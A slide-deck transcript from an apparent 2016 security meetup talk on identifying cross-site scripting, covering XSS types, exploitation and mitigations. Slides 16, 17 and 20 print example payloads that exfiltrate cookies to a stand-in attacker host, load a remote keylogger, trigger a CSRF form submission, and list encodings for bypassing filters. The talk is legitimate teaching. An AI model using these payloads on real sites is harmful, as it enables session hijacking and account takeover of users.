Upload File

identifying xss vulnerabilities

22
Cross Site Scripting(XSS) @nullhyd – June’16

Upload: nu-the-open-security-community

Post on 15-Jan-2017

370 views

Category:

Internet


1 download

Report

TRANSCRIPT

Page 1: Identifying XSS Vulnerabilities

Cross Site Scripting(XSS)@nullhyd – June’16

Page 2: Identifying XSS Vulnerabilities

#Whoami?• @NahtnahS• Web App Security Guy• Works as Security Analyst• Some HOF & acknowledgements

Page 3: Identifying XSS Vulnerabilities

Current Stats

Page 4: Identifying XSS Vulnerabilities

Experts says

Page 5: Identifying XSS Vulnerabilities

DefinitionCross-Site-Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites.

Source:owasp.org

Page 6: Identifying XSS Vulnerabilities

Anatomy of XSS

Page 7: Identifying XSS Vulnerabilities

Anatomy of XSS

Page 8: Identifying XSS Vulnerabilities

HTML Source Code

Page 9: Identifying XSS Vulnerabilities

Types Of XSS• Reflected • Stored• Dom

Page 10: Identifying XSS Vulnerabilities

Reflected XSS• Reflected attack generally is used to exploit script injection

vulnerabilities via URL in a web application

Page 11: Identifying XSS Vulnerabilities

How it is exploited?Send’s the link to victim

Creates

a

Malicio

us

link

Victim Requests Webpage

Sends data to Attacker

Page 12: Identifying XSS Vulnerabilities

Stored XSS • Stored XSS occurs when the injected script is stored in the

database and is delivered to the visitor of the application

Page 13: Identifying XSS Vulnerabilities

How stored XSS is exploitedCode gets saved into the databaseVictim visits the Infected web page

Sends data to attacker

Injects Malicious Script into web server

Malicious code gets executed in victims browser

Page 14: Identifying XSS Vulnerabilities

DOM XSS• DOM Based XSS is an XSS attack wherein the attack payload is

executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner

Page 15: Identifying XSS Vulnerabilities

Attacks executed by exploiting xss

• Session Hijacking• Redirection• Phishing • Keylogging• CSRF

Page 16: Identifying XSS Vulnerabilities

Exploiting XSS• Redirection :

<script>document.location.href=”http://www.MaliciousSite.com/” </script>

• Session Hijacking<script>document.location.href=”http://www.MaliciousSite.com/cookiestealer.php?cookie=”+document.cookie </script>

• KeyLogging<script src=”http://www.MaliciousSite.com/keylogger.js”> </script>

Page 17: Identifying XSS Vulnerabilities

Exploiting XSS• CSRF

o Page 1:• <form name=”delete”

action="http://yoursite.com/deleteuser"method="post">• <input type="hidden" name="userid" value="1">• <input type=”submit”>• </form>

o Page 2:• “><script>document.form.delete.submit();</script>

Page 18: Identifying XSS Vulnerabilities

Prevention ?• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.

Page 19: Identifying XSS Vulnerabilities

Mitigation• Input validation• Output Encoding:

o < > o &lt; &gt;o (&#40;) (&#41;)o&#35; &#38;

• Do not use "blacklist" validation• Specify the output encoding • Content Security Policy.

Page 20: Identifying XSS Vulnerabilities

Bypassing XSS FiltersEncoding Techniques works sometimes .Possible ways to represent ‘<‘

<, %3C, &lt, &lt;, &LT, &LT; , &#x3c, &#x03c, &#x003c, &#x0003c, &#x00003c, &#x000003c \x3c, \x3C, \u003c, \u003C

DEMO

Page 21: Identifying XSS Vulnerabilities

Questions ?

Page 22: Identifying XSS Vulnerabilities

Thank You!


Introduction to XSS attacks - ENSIMAG...Web based vulnerabilities XSS - Cross-Site scripting Reflected XSS / type 1 attack 12 12[IBM 2002] Cross-site scripting Fabien Duchene, Karim

CSP - the panacea for XSS - owasp.org another security blogger . XSS. 4 XSS ... Over 12 million email messages daily ... CSP Based IDS Magic XSS XSS XSS Test & Fix . 29

Secure Programming Cross-Site Scripting (XSS) Vulnerabitiesabc/teaching/bbm461/... · 2016. 2. 28. · Cross-Site Scripting Vulnerabilities A cross-site scripting vulnerability allows

A Formal Approach to Identifying Security Vulnerabilities ... · PDF fileA Formal Approach to Identifying Security Vulnerabilities in Telecommunication Networks ... of Mobile Switch

Impact of Network Security Vulnerabilities …...identifying network vulnerabilities (Chang, 1999). This method applied by Lucent Technology This method applied by Lucent Technology

Application Security - Deloitte United States · • Major OWASP top 10 vulnerabilities such as SQL Injection, Cross Site Scripting (XSS), Path Traversal • Block automated attacks

Identifying Vulnerabilities in SCADA Systems via Fuzz-Testing

Exploits: XSS, SQLI, Buffer Overflow These vulnerabilities continue to result in many active exploits. XSS - Cross Site Scripting, comparable to XSRF,

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research

The Art of Identifying Vulnerabilities - CascadiaFest 2015

faculty.scf.edufaculty.scf.edu/bodeJ/CIS2352/Supplemental Chapter... · Web viewNStalker is a WebApp security scanner used to search for vulnerabilities such as SQL injection, XSS,

Vulnerability Management for Operational …...• Mapping known vulnerabilities to assets—identifying which vulnerabilities affect products in an OT asset inventory. • Analyzing

Identifying Cross Site Scripting Vulnerabilities in Web Applications

BadNets: Identifying Vulnerabilities in the Machine …...BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain Tianyu Gu New York University Brooklyn, NY,

Enumerations – CPE, CVE, CCE...Enumerated Entities in SCAP •CVE - Vulnerabilities –CVE-2006-4838 Description: Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal

Fragile Networks: Identifying Vulnerabilities and ...manoa.hawaii.edu/ccpv/workshops/NagurneyFragileNetworksITOR.pdf · Fragile Networks: Identifying Vulnerabilities and Synergies

Ericsson Technology Review: Identifying and addressing the vulnerabilities and security issues of SDN

Identifying Security Vulnerabilities Survey

Security Vulnerabilities in Open Source Java Libraries Request Forgery (CSRF) Cross-Site Scripting (XSS) Cryptographic Issues . Path Traversal . Code Injection . ... Tomcat. Jboss

Exploiting Vulnerabilities: SQLi, XSS, XXE, File Injection · 2/22/2019  · Greetings to you Greetings to you ... us all. XSS. XSS Where user data is echoed verbatim on a page What

Breaking XSS mitigations - 2017.appsec.eu€™t trust the DOM... · Despite considerable effort XSS is a widespread and unsolved issue. Data point: 70% of vulnerabilities in Google

Table of Contents - XSS Payloads · interaction on the client side, a number of new attack surfaces, such as XSS and CSRF vulnerabilities, are opened. Most of the vulnerabilities

Detection and Prevention of XSS - المكتبة المركزيةlibrary.iugaza.edu.ps/thesis/118608.pdf · i Detection and Prevention of XSS Vulnerabilities in MOODLE By Rola Al-Azaiza

Never Trust Your Victim: Weaponizing Vulnerabilities in ...2.3 Cross-site scripting Cross-site scripting (XSS) is a major attack vector for the web, stably in the OWASP Top 10 vulnerabilities

Identifying Cross Site Scripting Vulnerabilities in Web Applicationswpage.unina.it/ptramont/Download/pres-wse2004.pdf · Identifying Cross Site Scripting Vulnerabilities in Web Applications

Code development practice - Hack.luarchive.hack.lu/2015/They Hate Us Cause They Ain't Us.pdf2 • Code development practice • Mitigates basic vulnerabilities • XSS • SQL Injection

By Brian Vees. SQL Injection Username Enumeration Cross Site Scripting (XSS) Remote Code Execution String Formatting Vulnerabilities

XSS Vulnerabilities

XSS And SQL Injection Vulnerabilities

Identifying Your Agency's Vulnerabilities

Vulnerability Analysis. Chapter 8: Identifying and Analyzing Threats, Vulnerabilities, and Exploits

Identifying Software and Protocol Vulnerabilities in WPA2

Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities

XSS Injection Vulnerabilities

IT Security: Threats, Vulnerabilities and Countermeasuresifap.ed.gov/sites/default/files/attachments/... · OWASP Top 10 Security Vulnerabilities • 1 - Cross Site Scripting (XSS)